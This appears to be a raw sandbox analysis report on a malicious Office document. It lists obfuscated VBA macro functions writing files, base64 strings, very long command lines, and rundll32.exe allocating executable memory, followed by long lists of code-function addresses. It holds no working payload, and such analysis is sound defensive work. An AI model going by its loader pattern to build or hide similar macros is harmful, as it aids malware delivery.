                    Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String createtextfile: Set mgrwfmN = RjiQHRA.CreateTextFile("CxQnJUo:\GongJKJ\vntyZI.ugzmBCOCC")Name: Jlda77h_v8nx5
                    Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function Hrs2a1p95u19, String createtextfile: Set uWZkeMFv = zDsRaIBGF.CreateTextFile("NFKiIDO:\sBRpIz\FFqJD.QevLKGfGs")Name: Hrs2a1p95u19
                    Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function Hrs2a1p95u19, String createtextfile: Set iHKuDmaEr = OMZxxg.CreateTextFile("QWqEKJnW:\BQVnVKF\gWdSBXA.TabDJBD")Name: Hrs2a1p95u19
                    Document contains an embedded VBA with base64 encoded stringsShow sources
                    Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String uTtCAFwHpCGF
                    Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String lwWhZGEasjsS
                    Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String MiCjaGqJfPrI
                    Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String KqVyuQQfwTWh
                    Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String mehEFPFHcklgJDDx
                    Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String wypNISsWSXthFJCq
                    Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String LvnHAGHfIhRDBRAF
                    Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String NeiIGCNWgICn
                    Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String NisSEYrcDlKQUITa
                    Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function Hrs2a1p95u19, String nJJzFRjEWpRikxCD
                    Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function Hrs2a1p95u19, String oLweAMoGsqVE
                    Very long command line foundShow sources
                    Source: unknownProcess created: Commandline size = 5709
                    Source: unknownProcess created: Commandline size = 5613
                    Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 5613Jump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Gpnlsmsow\Jump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000976F7_2_1000976F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0022B41F7_2_0022B41F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00222C637_2_00222C63
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002338957_2_00233895
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0022C0C67_2_0022C0C6
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0022EE787_2_0022EE78
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0022568E7_2_0022568E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002302C37_2_002302C3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002342DA7_2_002342DA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002287367_2_00228736
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00227B637_2_00227B63
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00234B417_2_00234B41
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023340A7_2_0023340A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023687F7_2_0023687F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0022F4447_2_0022F444
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0022E05A7_2_0022E05A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023A0AF7_2_0023A0AF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002280BA7_2_002280BA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002260B97_2_002260B9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002248BD7_2_002248BD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023889D7_2_0023889D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002288E57_2_002288E5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00221CFA7_2_00221CFA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002320C57_2_002320C5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00230D337_2_00230D33
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0022F5367_2_0022F536
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0022153C7_2_0022153C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00237D037_2_00237D03
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0022B1127_2_0022B112
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023511B7_2_0023511B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00235D1D7_2_00235D1D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00238D1C7_2_00238D1C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002269A07_2_002269A0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00236DB97_2_00236DB9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002361B87_2_002361B8
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002395867_2_00239586
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0022F98C7_2_0022F98C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002279987_2_00227998
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00226D9F7_2_00226D9F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002331E27_2_002331E2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002371EF7_2_002371EF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00222A307_2_00222A30
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00229A377_2_00229A37
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00224A357_2_00224A35
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00237A0F7_2_00237A0F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00235A617_2_00235A61
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0022EA4C7_2_0022EA4C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002262A37_2_002262A3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002212807_2_00221280
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002312E27_2_002312E2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002326F57_2_002326F5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002296CD7_2_002296CD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00238ADC7_2_00238ADC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0022BB3A7_2_0022BB3A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00230F0C7_2_00230F0C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00232B167_2_00232B16
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00237F1F7_2_00237F1F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0022C7697_2_0022C769
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00230B687_2_00230B68
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002317737_2_00231773
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0022E3777_2_0022E377
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00228F787_2_00228F78
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00225B797_2_00225B79
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00239B457_2_00239B45
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002323497_2_00232349
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00238F497_2_00238F49
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002267547_2_00226754
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0022B75F7_2_0022B75F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002217AC7_2_002217AC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002373AC7_2_002373AC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023878F7_2_0023878F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0022839D7_2_0022839D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00233FE77_2_00233FE7
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0022D7EB7_2_0022D7EB
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002367E97_2_002367E9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002363C17_2_002363C1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00231BDF7_2_00231BDF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00229FDC7_2_00229FDC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002AB41F8_2_002AB41F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002A2C638_2_002A2C63
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002AEE788_2_002AEE78
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002A568E8_2_002A568E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B38958_2_002B3895
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B02C38_2_002B02C3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002AC0C68_2_002AC0C6
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B42DA8_2_002B42DA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002A87368_2_002A8736
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002A7B638_2_002A7B63
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B4B418_2_002B4B41
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B63C18_2_002B63C1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002A2A308_2_002A2A30
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002A9A378_2_002A9A37
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002A4A358_2_002A4A35
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B340A8_2_002B340A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B7A0F8_2_002B7A0F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B5A618_2_002B5A61
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B687F8_2_002B687F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002AEA4C8_2_002AEA4C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002AF4448_2_002AF444
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002AE05A8_2_002AE05A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002BA0AF8_2_002BA0AF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002A62A38_2_002A62A3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002A80BA8_2_002A80BA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002A60B98_2_002A60B9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002A48BD8_2_002A48BD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002A12808_2_002A1280
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B889D8_2_002B889D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B12E28_2_002B12E2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002A88E58_2_002A88E5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002A1CFA8_2_002A1CFA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B26F58_2_002B26F5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002A96CD8_2_002A96CD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B20C58_2_002B20C5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B8ADC8_2_002B8ADC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002ABB3A8_2_002ABB3A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002A153C8_2_002A153C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B0D338_2_002B0D33
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002AF5368_2_002AF536
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B0F0C8_2_002B0F0C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B7D038_2_002B7D03
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B511B8_2_002B511B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B7F1F8_2_002B7F1F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B5D1D8_2_002B5D1D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B8D1C8_2_002B8D1C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002AB1128_2_002AB112
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B2B168_2_002B2B16
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002AC7698_2_002AC769
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B0B688_2_002B0B68
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002A8F788_2_002A8F78
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002A5B798_2_002A5B79
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B17738_2_002B1773
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002AE3778_2_002AE377
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B23498_2_002B2349
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B8F498_2_002B8F49
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B9B458_2_002B9B45
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002AB75F8_2_002AB75F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002A67548_2_002A6754
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002A17AC8_2_002A17AC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B73AC8_2_002B73AC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002A69A08_2_002A69A0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B6DB98_2_002B6DB9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B61B88_2_002B61B8
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B878F8_2_002B878F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002AF98C8_2_002AF98C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B95868_2_002B9586
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002A79988_2_002A7998
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002A6D9F8_2_002A6D9F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002A839D8_2_002A839D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002AD7EB8_2_002AD7EB
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B67E98_2_002B67E9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B71EF8_2_002B71EF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B31E28_2_002B31E2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B3FE78_2_002B3FE7
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B1BDF8_2_002B1BDF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002A9FDC8_2_002A9FDC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006C2C639_2_006C2C63
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006CEE789_2_006CEE78
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006CB41F9_2_006CB41F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006CC0C69_2_006CC0C6
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D02C39_2_006D02C3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D42DA9_2_006D42DA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006C568E9_2_006C568E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D38959_2_006D3895
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006C7B639_2_006C7B63
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D4B419_2_006D4B41
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006C87369_2_006C8736
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D63C19_2_006D63C1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D5A619_2_006D5A61
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D687F9_2_006D687F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006CEA4C9_2_006CEA4C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006CF4449_2_006CF444
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006CE05A9_2_006CE05A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006C4A359_2_006C4A35
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006C9A379_2_006C9A37
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006C2A309_2_006C2A30
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D7A0F9_2_006D7A0F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D340A9_2_006D340A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006C88E59_2_006C88E5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D12E29_2_006D12E2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006C1CFA9_2_006C1CFA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D26F59_2_006D26F5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006C96CD9_2_006C96CD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D20C59_2_006D20C5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D8ADC9_2_006D8ADC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006DA0AF9_2_006DA0AF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006C62A39_2_006C62A3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006C48BD9_2_006C48BD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006C60B99_2_006C60B9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006C80BA9_2_006C80BA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006C12809_2_006C1280
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D889D9_2_006D889D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006CC7699_2_006CC769
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D0B689_2_006D0B68
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006C8F789_2_006C8F78
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006C5B799_2_006C5B79
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006CE3779_2_006CE377
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D17739_2_006D1773
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D23499_2_006D2349
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D8F499_2_006D8F49
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D9B459_2_006D9B45
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006CB75F9_2_006CB75F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006C67549_2_006C6754
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006C153C9_2_006C153C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006CBB3A9_2_006CBB3A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006CF5369_2_006CF536
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D0D339_2_006D0D33
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D0F0C9_2_006D0F0C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D7D039_2_006D7D03
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D5D1D9_2_006D5D1D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D8D1C9_2_006D8D1C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D7F1F9_2_006D7F1F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D511B9_2_006D511B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D2B169_2_006D2B16
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006CB1129_2_006CB112
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D71EF9_2_006D71EF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D67E99_2_006D67E9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006CD7EB9_2_006CD7EB
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D3FE79_2_006D3FE7
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D31E29_2_006D31E2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006C9FDC9_2_006C9FDC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D1BDF9_2_006D1BDF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006C17AC9_2_006C17AC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D73AC9_2_006D73AC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006C69A09_2_006C69A0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D6DB99_2_006D6DB9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D61B89_2_006D61B8
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006CF98C9_2_006CF98C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D878F9_2_006D878F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D95869_2_006D9586
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006C839D9_2_006C839D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006C6D9F9_2_006C6D9F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006C79989_2_006C7998
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DB41F10_2_001DB41F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DEE7810_2_001DEE78
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D2C6310_2_001D2C63
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E389510_2_001E3895
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D568E10_2_001D568E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E42DA10_2_001E42DA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DC0C610_2_001DC0C6
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E02C310_2_001E02C3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D873610_2_001D8736
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E4B4110_2_001E4B41
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D7B6310_2_001D7B63
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E63C110_2_001E63C1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E7A0F10_2_001E7A0F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E340A10_2_001E340A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D4A3510_2_001D4A35
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D9A3710_2_001D9A37
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D2A3010_2_001D2A30
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DE05A10_2_001DE05A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DEA4C10_2_001DEA4C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DF44410_2_001DF444
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E687F10_2_001E687F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E5A6110_2_001E5A61
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E889D10_2_001E889D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D128010_2_001D1280
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D48BD10_2_001D48BD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D60B910_2_001D60B9
